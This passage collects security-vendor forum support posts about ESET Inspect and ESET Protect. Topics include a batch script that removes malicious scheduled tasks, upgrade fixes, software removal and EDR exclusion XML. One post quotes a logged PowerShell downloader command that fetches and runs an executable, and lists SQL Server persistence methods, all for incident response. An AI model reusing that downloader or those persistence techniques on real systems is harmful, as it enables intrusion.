"C:\Windows\System32\3pVll\71900321-1D34-44C1-911F-2BBA328E0C99" "%UserProfile%\Desktop\findRegistryTaskCache\ID_11_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\p0bTx07Y\219FA918-B3BA-4354-A48D-E82802A4AE4D.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_11_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA0BA5A1-E541-4F72-89F4-D81A46A737D3}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_12_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA0BA5A1-E541-4F72-89F4-D81A46A737D3}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\6B03865C-9D57-4514-8164-4A866CAFF3B1" "%UserProfile%\Desktop\findRegistryTaskCache\ID_12_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\zs2trQF69\6B03865C-9D57-4514-8164-4A866CAFF3B1" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\6B03865C-9D57-4514-8164-4A866CAFF3B1" "%UserProfile%\Desktop\findRegistryTaskCache\ID_12_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\zs2trQF69\6B03865C-9D57-4514-8164-4A866CAFF3B1" /f /q copy /Y /B "C:\Windows\System32\rAQBc8Wsa1\E184E7F9-EAD9-4967-9A4B-C93407F62B41" "%UserProfile%\Desktop\findRegistryTaskCache\ID_12_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\VPfvJcrgRY\D8DEA230-186E-47C9-A8B6-07A816746A19.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_12_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDFB972E-DCC2-49AB-A72A-9EA8C0794823}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_13_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDFB972E-DCC2-49AB-A72A-9EA8C0794823}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\sszCx\568614B6-D4F7-4CD5-B465-A09FD7BBFA1B" "%UserProfile%\Desktop\findRegistryTaskCache\ID_13_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\sszCx\568614B6-D4F7-4CD5-B465-A09FD7BBFA1B" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\sszCx\568614B6-D4F7-4CD5-B465-A09FD7BBFA1B" "%UserProfile%\Desktop\findRegistryTaskCache\ID_13_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\sszCx\568614B6-D4F7-4CD5-B465-A09FD7BBFA1B" /f /q copy /Y /B "C:\Windows\System32\aHSss\43A5FAE3-33E7-4982-8684-B8065FCFA006" "%UserProfile%\Desktop\findRegistryTaskCache\ID_13_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\Cxu3rz\08DF9DFB-F4A3-47FE-992F-8287FCF6BDAF.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_13_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D8464CE5-A81C-4140-9B9B-59B939988C24}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_14_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D8464CE5-A81C-4140-9B9B-59B939988C24}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\FHquEokFN6\AEA353D3-B46C-43D7-880E-40B48A9CAA43" "%UserProfile%\Desktop\findRegistryTaskCache\ID_14_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\FHquEokFN6\AEA353D3-B46C-43D7-880E-40B48A9CAA43" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\FHquEokFN6\AEA353D3-B46C-43D7-880E-40B48A9CAA43" "%UserProfile%\Desktop\findRegistryTaskCache\ID_14_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\FHquEokFN6\AEA353D3-B46C-43D7-880E-40B48A9CAA43" /f /q copy /Y /B "C:\Windows\System32\RGxFHquE\921B6482-0991-4094-9EB7-ADE85548C4E3" "%UserProfile%\Desktop\findRegistryTaskCache\ID_14_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\kFN64\6A082BD8-7372-4A26-B6CA-2347EDACF01F.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_14_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E1B38B8D-AF08-45D0-A77F-1DAA99606315}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_15_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E1B38B8D-AF08-45D0-A77F-1DAA99606315}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\O5kUNFdpt6\96D6023F-A7C8-4CDB-85D6-8B3E0DCAE1BD" "%UserProfile%\Desktop\findRegistryTaskCache\ID_15_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\O5kUNFdpt6\96D6023F-A7C8-4CDB-85D6-8B3E0DCAE1BD" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\O5kUNFdpt6\96D6023F-A7C8-4CDB-85D6-8B3E0DCAE1BD" "%UserProfile%\Desktop\findRegistryTaskCache\ID_15_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\O5kUNFdpt6\96D6023F-A7C8-4CDB-85D6-8B3E0DCAE1BD" /f /q copy /Y /B "C:\Windows\System32\ax7O5kUNFd\60160BA7-3B5C-4B57-A5DF-E1F69A7B7685" "%UserProfile%\Desktop\findRegistryTaskCache\ID_15_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\t6vhpw\E2B41A56-2C45-458E-957A-B86F057CAF95.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_15_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EA281A96-9880-404A-B496-988804DC23EB}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_16_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EA281A96-9880-404A-B496-988804DC23EB}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\9fksTdrJh\A7B9F301-80AE-4323-BD41-540D693A9615" "%UserProfile%\Desktop\findRegistryTaskCache\ID_16_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\9fksTdrJh\A7B9F301-80AE-4323-BD41-540D693A9615" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\9fksTdrJh\A7B9F301-80AE-4323-BD41-540D693A9615" "%UserProfile%\Desktop\findRegistryTaskCache\ID_16_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\9fksTdrJh\A7B9F301-80AE-4323-BD41-540D693A9615" /f /q copy /Y /B "C:\Windows\System32\6iE9f\54418D46-F18D-437C-9E28-C5D08A24C95D" "%UserProfile%\Desktop\findRegistryTaskCache\ID_16_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\sTdrJhGqL\3673DF21-9DB2-4277-A18F-8D8AFE4FD671.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_16_TASK_2022.11.11_07.18.41.4500_sys.Script" REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F42C9D05-58DA-4AD7-8CC6-14C6EC247CD4}" "%UserProfile%\Desktop\findRegistryTaskCache\ID_17_TASK_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F42C9D05-58DA-4AD7-8CC6-14C6EC247CD4}" /f REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\d0LVX\E35939A6-6C63-4F8A-8621-0106AE97D8CD" "%UserProfile%\Desktop\findRegistryTaskCache\ID_17_TREE_2022.11.11_07.18.41.4500.reg" REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\d0LVX\E35939A6-6C63-4F8A-8621-0106AE97D8CD" /f copy /Y /B "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\d0LVX\E35939A6-6C63-4F8A-8621-0106AE97D8CD" "%UserProfile%\Desktop\findRegistryTaskCache\ID_17_TASK_2022.11.11_07.18.41.4500.file" DEL "C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\d0LVX\E35939A6-6C63-4F8A-8621-0106AE97D8CD" /f /q copy /Y /B "C:\Windows\System32\fP2d0LVXW\0D819F39-E78C-400C-B916-D26D34F7D0B5" "%UserProfile%\Desktop\findRegistryTaskCache\ID_17_TASK_2022.11.11_07.18.41.4500_exe.pwsh" copy /Y /B "C:\Windows\System32\drivers\uhNaua8twc\82655E2E-718D-49A1-AF54-4256D82E5096.sys" "%UserProfile%\Desktop\findRegistryTaskCache\ID_17_TASK_2022.11.11_07.18.41.4500_sys.Script"

@j-gray I'm thinking something has the old password cached or not being updated properly after a password change. Can you try running the 2 following commands to blank out the current password used by the EI Server? First command backs up the registry key which contains this info. Second command will delete the specific value which contains an encrypted copy of the password. After running these commands and running the upgrade, when you get to the area asking for ESET Protect credentials, you will see the password is blanked out and you will be forced to type in the password manually. Reg Export "HKEY_LOCAL_MACHINE\SOFTWARE\ESET\EnterpriseInspector\Server\CurrentVersion\Info" "%userprofile%\Desktop\EI_InfoKey_BKCP.reg" Reg Delete "HKEY_LOCAL_MACHINE\SOFTWARE\ESET\EnterpriseInspector\Server\CurrentVersion\Info" /v "EraPassword"

@j-gray Your permissions sets look fine to me. And the logs showing "access denied" are due to how the EI Server communicates with the EP Server...but shouldn't be "access denied". I'm betting if you look inside of "%ProgramData%\ESET\RemoteAdministrator\Server\EraServerApplicationData\Logs\trace.txt", you will find some lines showing failed logins for the user. You would need to search for string "AuthenticateUser" without quotes. After conferring with some people in our support team that have encountered and corrected this, I have possible solutions. Can you try these and let me know which help or don't help? Solution 1 - Verify the EI account does not have "Password Change Required = Yes" In ESET Protect, got to "More > Users" Ensure you can see the user account you are using during the upgrade Click the Gear in the top right and select "Edit Columns" Find the "Password Change Required" and drag it to the right and put it so it is the second from the top. Click OK If "Password Change Required" shows Yes, change your user's password Also verify the user is "Enabled" Attempt to upgrade the EI server again Even though you can still log into the EP server, it would be good to rule out there being a flag to change the password being present. Solution 2 - Restart Two services on the ESET Protect server On the ESET Protect Server, stop the following 2 services: Apache Tomcat ESET Protect Server Once both services are fully stopped, start them back up in this order: Apache Tomcat ESET Protect Server Attempt to upgrade the EI server again The support team was adamant that both of the services need to be stopped, then started.

Can you do me a favor and try the following? Restart the ESET Protect service Try your upgrade again If it continues to be a pain: Restart the ESET Inspect service Try your upgrade again. If that works, let me know. I may want to gather some logs from you. I think it may be a rare issue where the user account is treated as disabled in ESET Protect, even though it is not disabled. I'm not sure why this happens, and its so rare that its been really hard to narrow down the exact solution/workaround.

For those managing multiple computers via ESET Protect, and would like a more streamline way of removing this software from all computers, this can be done for the installed software, but not for the browser plugins. Browser plugins are managed by the individual browsers, and not directly by the OS. These steps are not working 100% for the Bing Software mentioned in this thread. If I can improve upon this, I will post later. Here are the steps to use ESET Protect to uninstall 3rd party software which can be seen by ESET: This will guide you through the following: Ensure ESET Protect can see installed non-ESET Applications Create a dynamic group to group all computers with unwanted applications Create tasks that will run... ...anytime a computer has the undesired software installed and shows up in the dynamic group (thus uninstalling the unwanted software anytime a new computer joins this group) ...one time run of the tasks on computers that already joined the group while you created the tasks (to uninstall the unwanted software from computers that had already joined this group) I. Setup ESET Management Agent to report non-ESET Applications (only needed if not already configured) In ESET Protect, navigate to "Policies > New Policy" Name the policy "Report Non-ESET Applications" In "Settings" ensure you select "ESET Management Agent" from the drop-down at the top Expand "Advanced Settings" and locate and turn on "Report non-ESET-installed applications" Assign to either the "All" group, or to specific groups/computers of desire. Continue and finish creating the policy At this point, it may take a bit for the non-ESET software to be reported to ESET Protect. Your endpoints will need to check in once to get the policy, then check in again to supply the new info, then ESET Protect will need to parse and put the info into the database. Default check in times are 10 minutes. So you should start seeing the non-ESET applications in about 30 minutes in the following area: II. Check to see if ESET Protect sees the 3rd party applications: In ESET Protect, open the details of an individual computer, then click on "Installed Applications" If you can see Non-ESET applications, your settings are applied and working. You can also check to see if you see your undesired software is visible and has a "Yes" in the column "Agent supports uninstall" which means ESET can attempt to uninstall this software III. Create a dynamic group to group all computers with undesired software (this will help you see how many computers you have with the unwanted software, and allow for a quick way to uninstall the software) In ESET Protect, click on Computers on the left, locate "Windows Computers" in the list of Groups. Click on the gear to the right of this, and select "New Dynamic Group" Name the group "Has Unwanted Software" in the "Template" section, choose "New" and set the following: Name: Unwanted Software Expression: Operation: AND (All conditions have to be true) Click Add Rule and choose: "Installed Software > Application Name", and click OK Click Add Rule and choose: "Installed Software > Application Vendor", and click OK For Application Name, set to "is one of" and fill in the name "Microsoft Bing Service" In the Application Name section, click "Add" and then fill in the name "Bing Wallpaper" For Application Vendor, set to "is one of" , and fill in "Microsoft Corporation" Should look like this: Click Finish Over a short time, you will see computers start to appear here. Next we will make a task to remove the undesired software. IV. Create a task to start uninstalling unwanted software In ESET Protect, click on Computers on the left, then locate your newly made dynamic group named "Has Unwanted Software" Click the gear next to the group name and click "Tasks > New Task..." Name the task "Uninstall unwanted software - Microsoft Bing Service" and in the "Task" drop down, select "Software Uninstall" and click "Continue" In this Settings section, click on "<Select package to uninstall>" and select the first piece of software to uninstall "Microsoft Bing Service" You may desire to click on "Uninstall all versions of package" to ensure any version gets removed. Click "Continue" to get to the targets and ensure your desired target group "Has Unwanted Software" is showing in the list and then click "Continue" In the "Trigger section" set the trigger type to "Joined Dynamic Group Trigger" (this will run this task on any computer as it gets added to our dynamic group, but not on computers already in this group. We will remedy this shortly.) Continue and finish. On your group "Has Unwanted Software" click the gear and choose "Tasks > Run Tasks" Click on "Add Tasks" and find and checkmark your "Uninstall unwanted software - Microsoft Bing Service" and click OK For the "Trigger" section, ensure trigger type is "As Soon As Possible" and click finish. Repeat steps 1 through 11 but: in step 4 select "Bing Wallpaper" in step 3 and 10 use the task name "Uninstall unwanted software - Bing Wallpaper"

Hello, The detection is accurate. Its a Potentially Unwanted Application (which is an optional detection for software which is not a virus, but may be undesired). If you do not allow this software on your environments, it would be recommended to uninstall it. I just posted some uninstall steps here:

For those looking for assistance in removing this software, here are some steps to remove this from individual computers: Windows + R type "Appwiz.cpl" and press enter Find and uninstall/remove (at the end of the uninstall, you may be directed to a Microsoft web page asking if you meant to uninstall and asked if you want to reinstall. Just close this): Microsoft Bing Service Bing Wallpaper After that, start opening each web browser and checking for Bing Homepage/Search extensions/plugins and remove them (the prior uninstall leaves these in place and does not remove them). Chrome: In the address bar, navigate to "chrome://extensions/" and click "remove" to any thing like: "Microsoft Bing Homepage & Search for Chrome" After removal, you may be taken to a web page asking if you want to reinstall the extension.

Looking at your detection logs from the ELC, I can see that originally you had a BAT/Runner.FJ trojan from Oct 29-31. Then starting on Nov 1st, it changed to a Powershell/TrojanDownloader. What is interesting is that the BAT/Runner.FJ detections show: 10/31/2022 11:15:29 AM Command line scanner file C:\Windows\System32\cmd.exe BAT/Runner.FJ trojan cleaned by deleting NT SERVICE\MSSQLSERVER Event occurred while attempting to run the following command: "C:\Windows\System32\cmd.exe" /C "echo $client = New-Object System.Net.WebClient > C:\Users\MSSQLS~1\AppData\Local\Temp\update.ps1 & echo $client.DownloadFile("<snippedURL>","C:\Users\MSSQLS~1\AppData\Local\Temp\OBKLH1X4.exe") >> 😄\Users\MSSQLS~1\AppData\Local\Temp\update.ps1 & powershell -ExecutionPolicy Bypass C:\Users\MSSQLS~1\AppData\Local\Temp\update.ps1 & WMIC process call create "C:\Users\MSSQLS~1\AppData\Local\Temp\OBKLH1X4.exe"" 3352E2206ED375E648C9EA7B5171AC2CA4FCAF88 As you can see form the bolded underlined parts, it indicates these actions are definitely being done by your MS SQL server. I suspect your SQL management ports are exposed to the internet and you have successfully been brute forced and had some SQL persistence installed. You can use the following NMAP scans to try and see if your SQL ports are exposed to the internet. Just ensure you perform the scans from a computer on a different public IP. Scanning from a computer on the same public IP can lead to an incorrect scan results: nmap -Pn -sV -p 1433-1434 %PublicIP% nmap -Pn -sV -F %PublicIP There are many types of SQL Persistence, and if your MS SQL is hosting more than one database, each database will need to be checked. If you are having problems checking these, let us know and we can see about starting a DM to do some more specific SQL troubleshooting. You will be looking for the following types of MS SQL persistence: Stored Procedures At start of MS SQL service, a procedure will start and execute ever certain amount of seconds/minutes/hours A stored procedure can be "encrypted" to hide its definition from being easily seen More info on Stored Procedures here: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/ Triggers DDL Triggers - Data Definition Language Triggers Server based triggers which can be set to execute when specific queries like CREATE, ALTER, or DROP are used These triggers can be "encrypted" to hide the definition from being easily seen DML Triggers - Data Manipulation Language Triggers Database based triggers which can be set to execute on specific queries like INSERT, UPDATE, or DELETE Untested if these can be "encrypted" but it should be assumed that they can be encrypted as well Logon Triggers As their name implies, these are triggers which execute queries whenever a user logs in to MS SQL. And can theoretically, prevent a user from logging in. Untested if these can be "encrypted" but it should be assumed that they can be encrypted as well More info on Triggers here: https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/ Other notes In order to allow MS SQL to execute external applications, the use of advanced options is needed. You will want to check and disable these settings (Ensure you make not of what you changed, and monitor your SQL server for any issues afterwards. Your SQL server may have legitimately been using these settings) "show advanced options" - Allows the following settings to be used "xp_cmdshell" - Allows MS SQL to directly execute external applications like Ping.exe or any other executables on disk. "Ole Automation Procedures" - Allows MS SQL to execute Windows Script Host and VBScript macros, which allows wscript.shell to execute other executables on the computer's disk, without the use of xp_cmdshell. "clr enabled" - Allow you to store .net code inside of SQL which can be executed by a stored procedure. This is one of the more powerful ways of providing code execution to SQL. But these should easily be spotted when reviewing all stored procedures on a server.

There was some spitting of tables in the current v1.8. There is a good chance this is what lead to the upgrade taking longer. The only other item I know of that affects the speed of upgrading is hard drive space. If there isn't enough drive space, it can slow down or completely stop the upgrade process.

I recommend walking away and letting it be. Depending on which version you are upgrading from, it can take quite a bit to complete. Some of the earlier versions of EI could take hours to upgrade due to the changes needing to be made to the database. But yes, that final part of the upgrade will just sit there at about 92% for the longest. Hopefully your upgrade doesnt take too long, but don't be surprised if it does take a couple of hours. Just don't click cancel, and let it do what it needs to do.

The rule "Microsoft Office Wscript Usage [D0812]" is purely looking for any office application to load the wshom.ocx library. This library allows for the usage of the Windows Script Host directly without the need to use wscript.exe or cscript.exe. Sometimes users will use an office plugin that will lead to this detection and this will cause every use of an an MS Office application to trigger this detection. My recommended actions would be: If possible, supply a copy of the office document as a sample to Marcos or I (zipped up and password protected). We can help verify there are no normal macros, XLM macros, or Stomped (hidden) macros. Check the computer for any other dangerous detections by the EDR or by the Endpoint product itself Inside EI, open the details of the computer that triggered detection Then locate the tab at the top labeled "Detections" and review this for any other dangerous detections If you have not done so already, enable AMSI logging of MS Office documents (MS Office 2016 or newer only). This can add more details in EI to verify no macros were logged by AMSI (will post some steps for doing this via GPO below) you would need to click on the triggering process in the process tree "excel.exe (13000)", and then locate the tab at the top labeled "Scripts" If you do not find any other dangerous detections in EI, and the detection is not re-occurring, resolve the detection and move along. If you do not find any other detections in EI, and the detection keeps re-occurring, create an exclusion for the specific computer Lastly, you may want to touch base with the end user. They could have opened up Excel, opened the Macro editor, typed in a test macro and pressed F5 to run the macro causing the wshom.ocx library to be loaded. If I had to purely decide off what I see here for "is it malicious" it looks benign to me. No child processes. No WMI Execution EI Detections. Only oddity is the "winlogon.exe > userinit.exe > pfwsmgr.exe > Explorer.exe" for the ancestor processes. That pfwsmgr.exe is a bit odd to me, but I assume it may be some user management software you are using. Normal user logon process trees would simply look like "winlogon.exe > userinit.exe > Explorer.exe". Steps to enable AMSI logging via GPO (if needed) Download ADMX GPO Templates Download and extract ADMX file to DC Administrative Template files (ADMX/ADML) for Microsoft 365 Apps for enterprise/Office LTSC 2021/Office 2019/Office 2016 and the Office Customization Tool for Office 2016 https://www.microsoft.com/en-us/download/details.aspx?id=49030 There are both x86 and x64 versions. You will need the version to match the computer you will be managing GPOs from. Thus if you are on a x86 computer and managing GPOs, you would use the x86 version (does not need to match the arch of the MS Office on network) Run the EXE and follow its steps to extract them. Extract them to a temp location like "C:\CCSupport\ADMX_TEMP\" Next, from the "C:\CCSupport\ADMX_TEMP\admx\" directory, copy all .admx files from your temp folder, and place them in "C:\Windows\PolicyDefinitions\" Lastly, from the "C:\CCSupport\ADMX_TEMP\admx\" copy the "en-US" contents (.adml files) to the "C:\Windows\PolicyDefinitions\en-US\" directory. If other languages are needed, you can copy those to their corresponding locations Now, close any open Group Policy Management editors, and reopen one (you simply need to start editing or creating a new GPO), and check the following 2 locations for Microsoft Office branches. Computer Configuration > Policies > Administrative Templates Microsoft Office 2016 (Machine) Microsoft Office PowerPoint 2016 (Machine) User Configuration > Policies > Administrative Templates Microsoft Access 2016 Microsoft Excel 2016 Microsoft Office 2016 Microsoft OneNote 2016 Microsoft Outlook 2016 Microsoft PowerPoint 2016 Microsoft Project 2016 Microsoft Publisher 2016 Microsoft Teams Microsoft Visio 2016 Microsoft Word 2016 Set Group Policy to enable AMSI logging/scanning of MS Office VBA Macros: Edit or create a new policy that will be linked/applied to computers. In the Group Policy Editor, navigate to: User Configuration > Policies > Administrative Templates > Microsoft Office 2016 > Security Settings Locate "Macro Runtime Scan Scope" and Edit it. Set the policy to "Enabled" and then set the options to one of the following 2 items: "Enable for low trust documents" - AMSI scanning/logging of documents which are NOT any of the following: Opened while macro security settings are set to "Enable All Macros" Opened from a "Trusted Location" Trusted Documents Files that contain VBA that is digitally signed by a Trusted Publisher "Enable for all documents" - AMSI scanning is done for all documents regardless of where they came from. This is perfect for test environments, or for environments where a SOC is present to analyze all macros in an environment. Click OK/Apply, close any open windows. Go to a workstation and run "gpupdate /force" The following registry key should be set after the policy is applied: Key: HKCU\software\policies\microsoft\office\16.0\common\security Value: macroruntimescanscope Type: REG_DWORD Data: 0 = Off, 1 = Enable for Low Trust Docs, 2 = Enable for all docs

Should be answered here:

@isuruSam You would simply need to alter the advanced exclusion to meet your needs. This means you would have the following options to base your exclusion off of. You may want to exclude all processes which are of higher global reputation, which means only less reputable applications will trigger when injecting into MSTSC.exe: <definition> <process> <!-- Only exclude if the executable has a good global reputation (LiveGrid Rep) and has been seen globally on 100 or more computers --> <!-- You may need to change these numbers based on what you are seeing in your own environment --> <operator type="AND"> <condition component="LiveGrid" property="Reputation" condition="greaterOrEqual" value="8"/> <condition component="LiveGrid" property="Popularity" condition="greaterOrEqual" value="100"/> </operator> </process> <operations> <operation type="CodeInjection"> <!-- Describe the possible mstsc.exe processes which are being injected into. Remove or add any different types of components you desire. Keep in mind that this exclusion will not exclude any mstsc.exe processes from "%WINDIR%\WinSxX\..." locations--> <operator type="and"> <operator type="or"> <condition component="FileItem" property="FullPath" condition="is" value="%SYSTEM%\mstsc.exe"/> <condition component="FileItem" property="FullPath" condition="is" value="%WINDIR%\SysWOW64\mstsc.exe"/> </operator> <condition component="Module" property="SignatureType" condition="greaterOrEqual" value="90"/> <condition component="Module" property="SignerName" condition="is" value=" Microsoft Windows"/> </operator> </operation> </operations> </definition> If to many different processes are causing this to trigger, on the vast majority of computers, then you may want to exclude any process injecting into mstsc.exe. This means if something malicious does inject into mstsc.exe, you will not see it, but if MSTSC.exe starts doing other actions that are dangerous, you will still see those: <definition> <operations> <operation type="CodeInjection"> <!-- Describe the possible mstsc.exe processes which are being injected into. Remove or add any different types of components you desire. Keep in mind that this exclusion will not exclude any mstsc.exe processes from "%WINDIR%\WinSxX\..." locations--> <operator type="and"> <operator type="or"> <condition component="FileItem" property="FullPath" condition="is" value="%SYSTEM%\mstsc.exe"/> <condition component="FileItem" property="FullPath" condition="is" value="%WINDIR%\SysWOW64\mstsc.exe"/> </operator> <condition component="Module" property="SignatureType" condition="greaterOrEqual" value="90"/> <condition component="Module" property="SignerName" condition="is" value=" Microsoft Windows"/> </operator> </operation> </operations> </definition> In the end, the final decision on how to exclude is yours to decide. Feel free to use these examples as a base for building your own exclusion. Hopefully this helps you out.

I am going to assume that you are seeing injections into the "mstsc.exe" process (visible in the "Trigger Event" of the detection). If this is not correct, then please disregard the following There are 3 rules for "Injection into system process" (EDIT: Only apply exclusion to the rules causing incorrect detections): Injection into system process [F0413a][C] Injection into system process [F0413b][C] Injection into system process [F0413c][C] All are looking for injection into process located in: Windows\System32\ = %System% Windows\SysWOW64\ = %WinDir%\SysWOW64 Armed with knowing this is only happening on your terminal services servers, I would build an exclusion that will only apply to your terminal servers. The exclusion would look something like this: <definition> <process> <!-- List of servers go here. If only a single server, remove the operator tags from this process section --> <operator type="OR"> <condition component="Enterprise" property="ComputerName" condition="is" value="TermSvr001"/> <condition component="Enterprise" property="ComputerName" condition="is" value="TermSvr002"/> </operator> </process> <operations> <operation type="CodeInjection"> <!-- Describe the possible mstsc.exe processes which are being injected into. Remove or add any different types of components you desire. Keep in mind that this exclusion will not exclude any mstsc.exe processes from "%WINDIR%\WinSxX\..." locations--> <operator type="and"> <operator type="or"> <condition component="FileItem" property="FullPath" condition="is" value="%SYSTEM%\mstsc.exe"/> <condition component="FileItem" property="FullPath" condition="is" value="%WINDIR%\SysWOW64\mstsc.exe"/> </operator> <condition component="Module" property="SignatureType" condition="greaterOrEqual" value="90"/> <condition component="Module" property="SignerName" condition="is" value=" Microsoft Windows"/> </operator> </operation> </operations> </definition>

Your "Advanced" exclusion looks good to me. The ltsvc.exe process has a distance of 2 from the triggering process of find.exe There is a chance that the task to resolve matching detections is not working, and that the exclusion is working fine. I would suggest saving the advanced exclusion you posted above, and then manually resolve the current detections and wait to see if more of the same detections come in. And also check the "Hit Count" for the exclusion after letting it sit for a day or 2. "Hit Count" - For exclusions, this is how many detections the exclusion has prevented since it was last edited. Editing the exclusion will zero out the hit count. Where to find hit count: